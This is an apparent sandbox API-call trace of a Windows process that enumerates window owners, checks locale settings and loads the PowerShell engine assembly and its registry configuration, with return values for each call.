	[0107.777] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9e8
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9e8
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xb40
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xa00
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9f0
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9e0
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9d0
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9c0
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9b0
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9a0
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x990
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x980
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x970
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x960
	[0107.778] GetLastError () returned 0x0
	[0107.778] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x950
	[0107.778] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x940
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x930
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x920
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x910
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x900
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8f0
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8e0
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8d0
	[0107.779] GetLastError () returned 0x0
	[0107.779] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8c0
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8b0
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8a0
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x890
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x880
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x870
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x860
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x850
	[0107.780] GetLastError () returned 0x0
	[0107.780] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x840
	[0107.780] GetLastError () returned 0x0
	[0107.781] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x830
	[0107.781] GetLastError () returned 0x0
	[0107.781] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x820
	[0107.781] GetLastError () returned 0x0
	[0107.781] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x810
	[0107.781] GetLastError () returned 0x0
	[0107.781] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x20c
	[0107.921] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7c4
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xc0
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x688
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x6c0
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x408
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7d4
	[0107.922] GetLastError () returned 0x0
	[0107.922] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x544
	[0107.922] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x540
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x71c
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x31c
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7ec
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5b8
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x754
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x664
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x640
	[0107.923] GetLastError () returned 0x0
	[0107.923] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x700
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x410
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7a0
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x3b4
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5cc
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5d4
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7c0
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x364
	[0107.924] GetLastError () returned 0x0
	[0107.924] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x240
	[0107.924] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x560
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x57c
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7b0
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x6a4
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x32c
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x670
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x50c
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x514
	[0107.925] GetLastError () returned 0x0
	[0107.925] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f0
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x58c
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f4
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x794
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x778
	[0107.926] GetLastError () returned 0x0
	[0107.926] GetLastError () returned 0x0
	[0108.208] WerSetFlags () returned 0x0
	[0108.894] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0108.896] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10eb3c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10eb38 | out: pulNumLanguages=0x10eb3c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10eb38) returned 1
	[0108.896] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10eb3c, pwszLanguagesBuffer=0x28d5b38, pcchLanguagesBuffer=0x10eb38 | out: pulNumLanguages=0x10eb3c, pwszLanguagesBuffer=0x28d5b38, pcchLanguagesBuffer=0x10eb38) returned 1
	[0108.904] GetUserDefaultLocaleName (in: lpLocaleName=0x584bc0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0109.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.192] GetLastError () returned 0xcb
	[0109.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.200] GetLastError () returned 0xcb
	[0109.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.202] GetLastError () returned 0xcb
	[0109.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.214] GetLastError () returned 0xcb
	[0109.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.214] GetLastError () returned 0xcb
	[0109.214] SetErrorMode (uMode=0x1) returned 0x1
	[0109.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10ea48 | out: lpFileInformation=0x10ea48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0109.214] GetLastError () returned 0xcb
	[0109.214] SetErrorMode (uMode=0x1) returned 0x1
	[0109.214] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10eacc | out: lpdwHandle=0x10eacc) returned 0x94c
	[0109.215] GetLastError () returned 0x0
	[0109.215] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x28d8068 | out: lpData=0x28d8068) returned 1
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ea98, puLen=0x10ea94 | out: lplpBuffer=0x10ea98*=0x28d8104, puLen=0x10ea94) returned 1
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d81e0, puLen=0x10ea10) returned 1
	[0109.216] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0109.216] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d8234, puLen=0x10ea10) returned 1
	[0109.216] lstrlenW (lpString="System.Management.Automation") returned 28
	[0109.216] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d8290, puLen=0x10ea10) returned 1
	[0109.216] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.216] lstrcpyW (in: lpString1=0x584bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d82d0, puLen=0x10ea10) returned 1
	[0109.216] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.216] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d8338, puLen=0x10ea10) returned 1
	[0109.216] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0109.216] lstrcpyW (in: lpString1=0x584bc0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0109.216] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d83d4, puLen=0x10ea10) returned 1
	[0109.217] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.217] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d8438, puLen=0x10ea10) returned 1
	[0109.217] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0109.217] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d84b4, puLen=0x10ea10) returned 1
	[0109.217] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.217] lstrcpyW (in: lpString1=0x584bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x28d815c, puLen=0x10ea10) returned 1
	[0109.217] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0109.217] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x0, puLen=0x10ea10) returned 0
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x0, puLen=0x10ea10) returned 0
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10ea14, puLen=0x10ea10 | out: lplpBuffer=0x10ea14*=0x0, puLen=0x10ea10) returned 0
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ea08, puLen=0x10ea04 | out: lplpBuffer=0x10ea08*=0x28d8104, puLen=0x10ea04) returned 1
	[0109.217] VerLanguageNameW (in: wLang=0x0, szLang=0x584bc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0109.217] VerQueryValueW (in: pBlock=0x28d8068, lpSubBlock="\\", lplpBuffer=0x10ea1c, puLen=0x10ea18 | out: lplpBuffer=0x10ea1c*=0x28d8090, puLen=0x10ea18) returned 1
	[0109.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.224] GetLastError () returned 0xcb
	[0109.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.453] GetLastError () returned 0xcb
	[0109.458] lstrlenW (lpString="䅁") returned 1
	[0109.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9e0 | out: phkResult=0x10e9e0*=0x31c) returned 0x0
	[0109.462] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9e4 | out: phkResult=0x10e9e4*=0x320) returned 0x0
	[0109.462] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea18 | out: phkResult=0x10ea18*=0x324) returned 0x0
	[0109.465] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea58, lpData=0x0, lpcbData=0x10ea54*=0x0 | out: lpType=0x10ea58*=0x1, lpData=0x0, lpcbData=0x10ea54*=0x56) returned 0x0
	[0109.466] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea58, lpData=0x584bc0, lpcbData=0x10ea54*=0x56 | out: lpType=0x10ea58*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10ea54*=0x56) returned 0x0
	[0109.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.470] GetLastError () returned 0x0
	[0109.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.472] GetLastError () returned 0x0
	[0109.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.674] GetLastError () returned 0x0
	[0110.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.168] GetLastError () returned 0xcb
	[0112.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.492] GetLastError () returned 0x2
	[0112.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.492] GetLastError () returned 0x2
	[0113.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.352] GetLastError () returned 0xcb
	[0113.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.353] GetLastError () returned 0xcb
	[0113.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.494] GetLastError () returned 0xcb
	[0113.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.495] GetLastError () returned 0xcb
	[0113.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
